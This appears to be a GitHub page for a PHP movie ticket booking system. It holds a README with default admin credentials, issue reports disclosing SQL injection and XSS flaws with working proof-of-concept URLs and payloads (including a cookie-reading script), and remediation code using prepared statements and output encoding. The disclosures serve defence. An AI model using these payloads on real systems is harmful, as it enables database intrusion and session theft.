aman05382 / movie_ticket_booking_system_php

Movie Ticket Booking System, back-end coded with PHP and front-end coded with Bootstrap, CSS, HTML, and Javascript and used MySql in the database.

CSS 4.15% PHP 90.64% JavaScript 0.74% Hack 3.77% Batchfile 0.01% Shell 0.01% HTML 0.69%
theatre-booking ticketing-system movies booking-system cinema management system php mysql phpmyadmin

movie_ticket_booking_system_php's Introduction

Movie Ticket Booking System-PHP

The Movie Ticket Booking System lets users enquire about recent and available movies, book and cancel movie tickets according to theatre type and class type, enquire about the status of booked tickets, etc. The aim of this project is to design a website that gives people an easy platform to get details of trending films and to buy movie tickets in the easiest possible way, at any time and from anywhere.

Installation

For this project I used XAMPP.

1) Open phpMyAdmin.
2) Import 'cinema_db.sql'.
3) Open Connection.php and update db_name and password.
4) Go to the admin folder, open config.php and update db_name and password.

Usage

Admin Login Details

Username:- 123
Password:- 123

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

Created By

aman05382 RoshanB392 Yadav99 ramtekerohit

movie_ticket_booking_system_php's Issues

Movie Ticket Booking System-PHP SQL injection vulnerability exists

Build environment: Apache 2.4.49; MySQL 5.7.26; PHP 7.3.4

1. Movie Ticket Booking System-PHP SQL injection vulnerability exists

In booking.php, from line 4 to line 12 of the code, the value of id is passed to the backend through the GET request and is assigned to the variable $id. Then $id is substituted into the database query, which is assigned to the variable $movieQuery, and the query result is returned by mysqli_query, giving an error-based SQL injection vulnerability.

POC:

http://vulcinema.test/booking.php?id=3%20or%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

Movie Ticket Booking System-PHP XSS vulnerability

Build environment: Apache 2.4.49; MySQL 5.7.26; PHP 7.3.4

1. Movie Ticket Booking System-PHP XSS vulnerability

There is an XSS vulnerability in booking.php. At line 111, we can see that the value attribute is equal to the value of the variable $id, and the controllable variable $id is determined by user input and output directly. At this point, we can construct a closing XSS statement. The payload is "><script>alert("ace")</script>, and with it we can produce a pop-up window.

<input type="hidden" name="movie_id" value="<?php echo $id; ?>">

POC:

http://vulcinema.test/booking.php?id=5%22%3E%3Cscript%3Ealert(%22ace%22)%3C/script%3E

Movie Ticket Booking System-PHP XSS vulnerability

Build environment: Apache 2.4.49; MySQL 5.7.26; PHP 7.3.4

1. Movie Ticket Booking System-PHP XSS vulnerability

In TxnStatus.php, code line 17: ORDER_ID is input by the user and assigned to the variable $ORDER_ID through a POST request. $ORDER_ID is then directly output in line 44 of the code, inside value="", with no filtering. That is to say, we can construct a closing JavaScript statement to pop up a window on the page. However, we can bypass the character limit at the front end, which is very simple.

$ORDER_ID = $_POST["ORDER_ID"];
<td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value="<?php echo $ORDER_ID ?>">

PAYLOAD:

"><script>alert("ace")</script>

Then check the website source code:

<td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value=""><script>alert("ace")</script>">

Movie Ticket Booking System-PHP SQL injection vulnerability exists

Build environment: Apache 2.4.49; MySQL 5.7.26; PHP 7.3.4

1. Movie Ticket Booking System-PHP SQL injection vulnerability exists

In editBooking.php, in lines 30-38 of the code, the parameters requested by the front-end POST include first, last, number, email, and amount, while the variable $id is controllable. In lines 17-19 of the code, it is directly substituted into the database query. In line 38 of the code, a SQL injection vulnerability is generated at $id.

  • SQL injection delay 5 seconds

  • SQL injection delay 10 seconds

POC:

http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(10)))--%20ace
http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(5)))--%20ace
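
A hardened form of the id lookup reported for booking.php and editBooking.php, added here as an example; it is not code from the project. It uses PDO with an in-memory SQLite database so it runs without a MySQL server, and the table name `bookings`, its columns and the helper names are assumptions. With mysqli the same pattern is `prepare()` followed by `bind_param()`.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the booking table; table and column names are hypothetical.
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE bookings (id INTEGER PRIMARY KEY, first TEXT, last TEXT, email TEXT)');
    $db->exec("INSERT INTO bookings VALUES (71, 'Test', 'User', 'test@example.com')");
    return $db;
}

// Returns the booking row, or null when the id is not a positive integer
// or no row matches.
function find_booking(PDO $db, $rawId): ?array
{
    // 1. Allow-list: an id is a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. The query text is fixed; the value travels separately as a bound
    //    parameter, so it can never change the structure of the statement.
    $stmt = $db->prepare('SELECT id, first, last, email FROM bookings WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = make_demo_db();
$inputs = [
    '71',                                   // legitimate id
    "71' and (select(sleep(10)))-- ace",    // id value from the editBooking.php PoC, URL-decoded
    '',                                     // missing parameter
];
foreach ($inputs as $input) {
    $row = find_booking($db, $input);
    printf("%-40s => %s\n", json_encode($input), $row ? 'booking #' . $row['id'] : 'rejected');
}
```
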

Movie Ticket Booking System-PHP-There is a storage XSS vulnerability

Build environment: Apache 2.4.49; MySQL 5.7.26; PHP 7.3.4

Movie Ticket Booking System-PHP-There is a storage XSS vulnerability

In editBooking.php, from line 63 to line 70 of the code, the content entered by the user is stored directly in the database without filtering, and is then displayed and processed in view.php. In view.php, from line 91 to line 101, the content input by the front end is directly output without any tag closing.

POC:

ace<script>alert(document.cookie)</script>
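
Output encoding for the three XSS sinks reported above (the hidden field in booking.php, the ORDER_ID field in TxnStatus.php, and stored booking data shown by view.php), added here as an example; it is not code from the project. The helper names and the `<td>` markup for view.php are assumptions, since view.php is not quoted in the report.

```php
<?php
declare(strict_types=1);

// Encode a value for HTML text nodes and quoted attribute values.
function e($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// booking.php hidden field: the id is numeric, so validate it, then encode on output.
function movie_id_field($rawId): string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return ''; // render nothing; the caller should answer with HTTP 400
    }
    return '<input type="hidden" name="movie_id" value="' . e($id) . '">';
}

// TxnStatus.php ORDER_ID field: maxlength="20" is only a browser hint, so the
// limit is enforced again on the server before the value is encoded.
function order_id_field($rawOrderId): string
{
    $orderId = is_string($rawOrderId) ? substr($rawOrderId, 0, 20) : '';
    return '<input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID"'
        . ' autocomplete="off" value="' . e($orderId) . '">';
}

// view.php: data read back from the database is untrusted too, so it is
// encoded at the point where it is written into the page (hypothetical markup).
function booking_cell($storedValue): string
{
    return '<td>' . e($storedValue) . '</td>';
}

// Payloads quoted in the reports above, used here as test input.
echo movie_id_field('5"><script>alert("ace")</script>'), "\n"; // fails validation
echo movie_id_field('5'), "\n";
echo order_id_field('"><script>alert("ace")</script>'), "\n";
echo booking_cell('ace<script>alert(document.cookie)</script>'), "\n";
```
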
